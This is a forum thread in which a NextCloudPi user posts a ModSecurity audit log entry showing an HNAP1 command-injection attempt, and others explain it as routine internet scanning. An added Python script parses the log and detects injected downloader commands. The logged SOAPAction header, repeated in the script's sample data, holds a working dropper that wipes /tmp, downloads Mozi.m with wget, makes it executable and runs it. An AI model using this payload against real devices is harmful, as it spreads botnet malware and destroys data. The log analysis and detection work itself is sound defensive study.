Possible attack found in log, maybe critical!?

Searching my modsec_audit.log I found a bad-looking record. I am an expert neither on modsec/OWASP nor on Nextcloud security, but it came to my mind that without modsec this could have been very critical. I post the logs here FYI…

--9b16584a-A--
[12/Dec/2019:09:48:54 +0100] XfH@69FbIjAPMe5hD5oFuAAAAAo 223.149.142.18 38346 192.168.2.140 80
--9b16584a-B--
POST /HNAP1/ HTTP/1.0
Host: 84.150.179.8:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640

--9b16584a-F--
HTTP/1.1 302 Found
Strict-Transport-Security: max-age=15768000; includeSubDomains; preload
Location: https://84.150.179.8/HNAP1/
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

--9b16584a-E--
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://84.150.179.8/HNAP1/">here</a>.</p>
</body></html>

--9b16584a-H--
Message: Warning. Match of "rx ^%{tx.allowed_request_content_type_charset}$" against "TX:1" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1044"] [id "920480"] [msg "Request content type charset is not allowed by policy"] [data "\x22utf-8\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/3.1.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/CONTENT_TYPE_CHARSET"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"]
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client 223.149.142.18] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type_charset}$" against "TX:1" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1044"] [id "920480"] [msg "Request content type charset is not allowed by policy"] [data "\\\\x22utf-8\\\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/3.1.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/CONTENT_TYPE_CHARSET"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "84.150.179.8"] [uri "/HNAP1/"] [unique_id "XfH@69FbIjAPMe5hD5oFuAAAAAo"]
Stopwatch: 1576140523050850 11101552 (- - -)
Stopwatch2: 1576140523050850 11101552; combined=13960, p1=9756, p2=0, p3=612, p4=3011, p5=577, sr=1429, sw=4, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.3 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
Server: Apache
Engine-Mode: "ENABLED"

--9b16584a-Z--

Could you please provide some explanation on what this log shows?

Fu, hoped some master could clear that…

I run a NextCloudPi instance on my ODROID; I have done some security modding. I turned fail2ban on and tweaked the OWASP rules to get Nextcloud functional, but not more. If some suspicious activity is detected by modsec, it will be logged in the audit log file. Fail2ban is configured to read the log and ban the IP addresses that violate the OWASP security rules.

There are tons of violations in the log, but this one:

SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`

looks really bad to me. I googled SOAP:

SOAP (abbreviation for Simple Object Access Protocol) is a messaging protocol specification for exchanging structured information in the implementation of web services in computer networks. Its purpose is to provide extensibility, neutrality and independence. It uses XML Information Set for its message format, and relies on application layer protocols, most often Hypertext Transfer Protocol (HTTP), although some legacy systems communicate over Simple Mail Transfer Protocol (SMTP), for message negotiation and transmission.

and this

http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`

loads something from an address that is redirected to an IP

https://84.150.179.8/HNAP1/

gets it into /tmp, makes it executable and runs it!?!

With some kind of exploit; as said above I am no security pro, but it smells like ransomware or botnet shit, or I am just nervous, who knows…

I read the logs only sometimes but regularly, and have never read something like this.

If this is trivial, sorry for wasting your time.
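One way to triage an entry like this programmatically, as an added example that is not part of the original post or of the NextCloudPi project: the script below parses the serial-format modsec_audit.log into its lettered sections (A, B, F, H, Z), pulls the client IP, request target and fired rule IDs out of each entry, and extracts any shell command embedded in backticks or $( ) in the request path or a header. It also reconstructs, in simplified form, the charset check of CRS rule 920480, because the H section above shows that rule matched on the quoted charset token (the [data] field is \x22utf-8\x22, i.e. the surrounding quotes were captured) and not on the command in SOAPAction. The capture regex, the allow-list of charsets, the function names and the sample log (the post's entry plus a constructed benign WebDAV request) are assumptions made for this example.

```python
import re

# Constructed sample: the entry from the post (trimmed) plus one ordinary
# Nextcloud WebDAV request so the triage has something benign to compare against.
SAMPLE_AUDIT_LOG = """
--9b16584a-A--
[12/Dec/2019:09:48:54 +0100] XfH@69FbIjAPMe5hD5oFuAAAAAo 223.149.142.18 38346 192.168.2.140 80
--9b16584a-B--
POST /HNAP1/ HTTP/1.0
Host: 84.150.179.8:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640

--9b16584a-F--
HTTP/1.1 302 Found
Location: https://84.150.179.8/HNAP1/

--9b16584a-H--
Message: Warning. Match of "rx ^%{tx.allowed_request_content_type_charset}$" against "TX:1" required. [id "920480"] [msg "Request content type charset is not allowed by policy"] [severity "CRITICAL"]
Engine-Mode: "ENABLED"

--9b16584a-Z--

--1a2b3c4d-A--
[12/Dec/2019:10:00:00 +0100] Xf0000000000000000000000 203.0.113.7 50000 192.168.2.140 80
--1a2b3c4d-B--
PROPFIND /remote.php/dav/files/alice/ HTTP/1.1
Host: 84.150.179.8
Content-Type: application/xml; charset=utf-8
Depth: 1

--1a2b3c4d-H--
Message: Warning. [id "920350"] [msg "Host header is a numeric IP address"] [severity "WARNING"]
Engine-Mode: "ENABLED"

--1a2b3c4d-Z--
"""

SECTION_RE = re.compile(r"^--([0-9a-f]+)-([A-Z])--$", re.M)
AUDIT_META_RE = re.compile(r"^\[(.+?)\] (\S+) (\S+) (\d+) (\S+) (\d+)$")
RULE_ID_RE = re.compile(r'\[id "(\d+)"\]')
INJECT_RE = re.compile(r"`([^`]+)`|\$\(([^)]+)\)")   # backtick or $( ) substitution
URL_RE = re.compile(r"https?://[^\s`'\"]+")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")

# Simplified reconstruction (an assumption, not the CRS source) of rule 920480 as it
# behaved in the log above: capture everything after "charset=" up to ";" or whitespace,
# then require the capture to be on the allow-list. A quoted charset keeps its quotes,
# so the token "utf-8" (quotes included) is not on the list and the rule fires.
ALLOWED_CHARSETS = {"utf-8", "iso-8859-1", "iso-8859-15", "windows-1252"}
CHARSET_RE = re.compile(r"charset\s*=\s*([^;\s]+)", re.I)


def split_entries(text):
    """Map boundary id -> {section letter: body} for a serial-format audit log."""
    parts = SECTION_RE.split(text)          # [preamble, id, letter, body, id, letter, body, ...]
    entries = {}
    for i in range(1, len(parts), 3):
        bid, letter, body = parts[i], parts[i + 1], parts[i + 2]
        entries.setdefault(bid, {})[letter] = body.strip("\n")
    return entries


def parse_audit_meta(section_a):
    """Section A: [timestamp] unique_id src_ip src_port dst_ip dst_port."""
    ts, uid, src_ip, src_port, dst_ip, dst_port = AUDIT_META_RE.match(section_a).groups()
    return {"timestamp": ts, "unique_id": uid, "src_ip": src_ip,
            "src_port": int(src_port), "dst_ip": dst_ip, "dst_port": int(dst_port)}


def parse_request(section_b):
    """Section B: request line followed by headers (names lower-cased)."""
    lines = section_b.split("\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def parse_rule_ids(section_h):
    return RULE_ID_RE.findall(section_h)


def charset_violation_920480(content_type):
    """Return the captured charset token if the reconstructed rule would fire, else None."""
    m = CHARSET_RE.search(content_type)
    if not m:
        return None
    token = m.group(1)
    return None if token.lower() in ALLOWED_CHARSETS else token


def extract_injected_command(value):
    m = INJECT_RE.search(value)
    return (m.group(1) or m.group(2)) if m else None


def triage(entry):
    """Summarise one audit entry: who sent it, what it hit, which rules fired, any injected shell."""
    meta = parse_audit_meta(entry["A"])
    req = parse_request(entry["B"])
    findings = []
    for where, value in [("path", req["path"])] + list(req["headers"].items()):
        cmd = extract_injected_command(value)
        if cmd is None:
            continue
        findings.append({
            "location": where,
            "command": cmd,
            "download_urls": URL_RE.findall(cmd),
            # classic dropper shape: fetch a file, chmod it, run it
            "drops_and_executes": bool(DOWNLOADER_RE.search(cmd)) and "chmod" in cmd,
        })
    return {
        "client": meta["src_ip"],
        "target": req["path"],
        "rule_ids": parse_rule_ids(entry.get("H", "")),
        "rule_920480_token": charset_violation_920480(req["headers"].get("content-type", "")),
        "findings": findings,
    }


def triage_log(text):
    return {bid: triage(sections) for bid, sections in split_entries(text).items()}


if __name__ == "__main__":
    for bid, result in triage_log(SAMPLE_AUDIT_LOG).items():
        print(bid, result)
```

Running it on the sample reports one finding for the HNAP1 entry (the injected command in the SOAPAction header, its download URL, and the fetch-chmod-execute shape) and none for the WebDAV request, while rule 920480 fires only on the quoted charset of the first request. Two things worth keeping in mind when reading such an entry: "Warning." in the Message line means the rule contributed to the anomaly score rather than blocking on its own, and the F section here is Apache's own 302 redirect to HTTPS, so the audit entry alone does not show that the request was ever handled by an application.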

As far as I understand it, you would need to have a listening SOAP server. Those kinds of “attacks” are very common. If you check your logs you will also find hundreds of SSH login attempts with common username/password combinations. This is just what the Internet is like. You could probably install an application firewall and block all SOAP requests if you don’t use it. I am not familiar with modsec.

So in summary, I think this is nothing to worry about and just the regular attack background noise of the Internet.

watch your language, dude!

This is a local IP address… so maybe you want to find out which machine in your local network was assigned that number. (a.b.c.1 addresses are often assigned to routers, but not always.)

You got the “fu” wrong, wasn’t meant that way.

My home devices are using 192.168.2.XXX; there’s nothing in this range here…

But to clarify: I don’t need help or an explanation of what was going on there. I wanted to show this log to the devs. I had concerns that if someone (I think most of you) has Nextcloud without ModSecurity, this attack would not have been blocked. Maybe this is a vulnerability that is not known and has to be fixed. Btw: the remote IP address is another Nextcloud, https://84.150.179.8/HNAP1/

This is what I believe too, so it was a blind shot and couldn’t do harm. Like I said: I often search the logs, but this was something I saw for the first time.

Thank you

ok… accepted